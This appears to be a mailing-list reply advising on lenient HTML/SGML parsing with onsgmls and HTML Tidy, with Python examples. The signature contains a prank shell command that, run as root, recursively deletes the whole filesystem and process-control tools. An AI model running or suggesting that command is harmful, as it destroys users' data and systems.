vc wrote:
> Hi,
>
> I'm looking for an XML parser that wouldn't stop if it finds a minor error
> in an XML file.
onsgmls keeps going to the end (or until it hits a configurable number of errors).
Part of OpenSP from
http://sourceforge.net/projects/openjade/
> I need to parse an HTML file and there are a lot of HTML
> pages that, for instance, don't enclose attribute values in quotes.
But they may be perfectly valid SGML, not XML. SGML permits lots of
abbreviations that are not allowed in XML.
Or they may just be garbage (more likely).

You can run them through HTML Tidy to try and make them XHTML.
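
To see why an XML parser stops on unquoted attribute values, here is a minimal Python sketch using only the standard library. The sample markup and the helper names (xml_error, AttrCollector, lenient_attrs) are made up for illustration. Note that html.parser is a swapped-in lenient tokenizer, not onsgmls or Tidy, and it does not validate anything.

```python
import xml.etree.ElementTree as ET
from html.parser import HTMLParser

# Hypothetical sample: attribute values without quotes, fine in SGML-based
# HTML but not well-formed XML.
SAMPLE = '<p class=intro>Hello <a href=page.html>world</a></p>'


def xml_error(text):
    """Return the XML parser's complaint, or None if the text is well-formed."""
    try:
        ET.fromstring(text)
    except ET.ParseError as exc:
        return str(exc)
    return None


class AttrCollector(HTMLParser):
    """Record (tag, attributes) for every start tag, tolerating sloppy markup."""

    def __init__(self):
        super().__init__()
        self.seen = []

    def handle_starttag(self, tag, attrs):
        self.seen.append((tag, dict(attrs)))


def lenient_attrs(text):
    """Feed the text to the lenient tokenizer and return what it saw."""
    parser = AttrCollector()
    parser.feed(text)
    parser.close()
    return parser.seen


if __name__ == "__main__":
    print("XML parser says:", xml_error(SAMPLE))
    print("Lenient parser saw:", lenient_attrs(SAMPLE))
```

The XML parser gives up at the first unquoted value, while the lenient tokenizer carries on and reports both elements.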
> Or, for instance, most of HTML pages don't have a root tag/element (that
> could be "html").
That, too, is permitted in some older SGML DTDs for HTML.
> Instead, they have "doctype" tag before and at the same
> level with "html" and XML parsers report an error "no root tag found".
That's a DocType Declaration. It specifies the version of HTML being used
(in theory: in practice it's garbage added by editors which don't know
what they are doing and just throw it in to confuse things).
Again, use HTML Tidy to try and make the file into XHTML.
Then validate with:
$ onsgmls -wxml -s /your/path/to/xml.dec filename.xml
If you use Emacs, this can be configured to happen automatically when you
validate a document, and the error lines get coloured and become links to
the location in the document where the error was spotted.
You will need a copy of the XML Declaration (xml.dec). The original at
http://www.w3.org/TR/NOTE-sgml-xml-971215 is starting to suffer from
bitrot and W3C neglect, so I have put a working copy online at
http://xml.silmaril.ie/xml.dec_onsgmls (note this is slightly different
from the original, which is available at
http://xml.silmaril.ie/xml.dec_jc)
Just rename it to xml.dec on your machine.
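
If you want to script the Tidy-then-validate sequence, something like the following Python sketch may do. It is only a sketch under assumptions: that tidy and onsgmls are both on your PATH, that the file names are your own, and that the function names (tidy_command, onsgmls_command, clean_and_validate) are invented here for illustration. The onsgmls arguments are the same as in the command above.

```python
import shutil
import subprocess


def tidy_command(html_in, xhtml_out):
    """Build an HTML Tidy command line that writes XHTML to xhtml_out."""
    # -quiet: no banner; -asxhtml: emit XHTML; -output: write to a file
    return ["tidy", "-quiet", "-asxhtml", "-output", xhtml_out, html_in]


def onsgmls_command(xml_decl, filename):
    """Build the onsgmls command line used earlier in this post."""
    # -wxml: warn about constructs XML does not allow; -s: suppress normal output
    return ["onsgmls", "-wxml", "-s", xml_decl, filename]


def clean_and_validate(html_in, xhtml_out, xml_decl):
    """Run Tidy, then onsgmls; return the validator's error lines (may be empty)."""
    for tool in ("tidy", "onsgmls"):
        if shutil.which(tool) is None:
            raise FileNotFoundError(tool + " not found on PATH")
    tidy = subprocess.run(tidy_command(html_in, xhtml_out))
    # Tidy exits with 0 for clean input, 1 for warnings, 2 for errors
    if tidy.returncode >= 2:
        raise RuntimeError("tidy reported errors in " + html_in)
    result = subprocess.run(
        onsgmls_command(xml_decl, xhtml_out),
        capture_output=True,
        text=True,
    )
    # onsgmls writes its error messages to standard error
    return result.stderr.splitlines()
```

Calling clean_and_validate("page.html", "page.xhtml", "/your/path/to/xml.dec") would then return one string per error line, or an empty list if onsgmls had nothing to say.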
///Peter
--
sudo sh -c "cd /;/bin/rm -rf `which killall kill ps shutdown mount gdb` *
&;top"